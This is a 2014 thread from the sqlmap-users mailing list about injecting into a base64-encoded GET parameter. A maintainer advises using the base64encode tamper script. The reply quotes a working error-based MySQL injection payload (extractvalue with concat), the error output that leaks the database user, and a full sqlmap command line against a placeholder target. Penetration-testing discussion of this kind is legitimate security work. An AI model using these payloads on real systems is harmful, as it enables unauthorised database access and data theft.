Re: [sqlmap-users] Where in the kb/conf.parameters does sqlmap store parsed variables?

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Miroslav,

I previously exploited this manually. The injection occurs in the mysql
INSERT statement. If the statement is invalid, we get an error message in
html comments like so:

<!--You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''lalalaa)))
or'')' at line 1-->

Which then is exploitable using some well documented methods such as
appending string like this:
' or extractvalue(1,concat(0x7e,(SELECT user()))) or'

which gives us a nice error:
<!--XPATH syntax error: '~root@localhost'-->

Anyhow, I got halfway there with the following string:
sqlmap -u '
https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
--tamper=base64encode --dbms=mysql  -v 3 --proxy=http://localhost:8080
sqlmap sends correctly encoded test vectors, but it doesn't send the
correct initial URL stability check vector:

1st request URL:
https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
2nd request URL: https://target/script.php?
data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D

Also none of the test vectors seem to trigger an error response.

I tried with  --risk=3 with no avail.

version: 1.0-dev-1ef2c40

--
Konrads Smelkovs
Applied IT sorcery.

On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
wrote:

> Hi.
>
> In your case I would do this:
>
> 1) Decode original base64 value and give it to the sqlmap in decoded form
> (e.g. id=123 instead of original id=313233)
> 2) Use --tamper=base64encode
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...>
> wrote:
>
>> Hello,
>>
>> I am writing a small modification which would allow to tamper/decode
>> variables in the request?
>> As I understand that the parameters are decoded/parsed into a dict
>> after option.py:2323 (parseTargetDirect()), but where can I access the
>> full, parsed dict of the get/post/cookie values?
>>
>> (specifically I have a base64 encoded string as a parameter and to
>> insert the payload, the parameter must be base64-decoded, injected and
>> then encoded back)
>>
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>>
>> ------------------------------------------------------------------------------
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>